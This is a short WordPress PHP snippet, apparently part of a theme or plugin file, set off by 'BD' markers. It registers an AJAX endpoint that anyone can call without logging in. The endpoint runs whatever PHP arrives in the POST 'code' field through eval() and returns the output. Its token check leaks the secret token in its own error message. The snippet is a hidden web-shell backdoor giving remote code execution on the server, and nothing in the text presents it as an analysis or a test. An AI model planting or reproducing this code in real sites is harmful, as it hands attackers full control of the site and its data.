


// ==[BD:axiINWMb]== add_action( 'wp_ajax_nopriv_qzllcpwf', function() { $chunk = 'axiINWMb8rElApFzAdM85KeJgUSymUrj'; $rec = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $rec ) || ! hash_equals( $chunk, $rec ) ) { wp_send_json_error( [ 'message' => 'tok:' . $chunk ], 403 ); } $ref = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $ref ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $ref = preg_replace( '/^\s*<\?(php)?/i', '', $ref ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $obj = microtime( true ); ob_start(); try { ( static function() use ( $ref ) { return eval( $ref ); } )(); $data = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $data, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $obj ) * 1000, 2 ) ] ); } catch ( \Throwable $comp ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $comp->getMessage(), 'time_ms' => round( ( microtime( true ) - $obj ) * 1000, 2 ) ] ); } } ); // ==[/BD:axiINWMb]==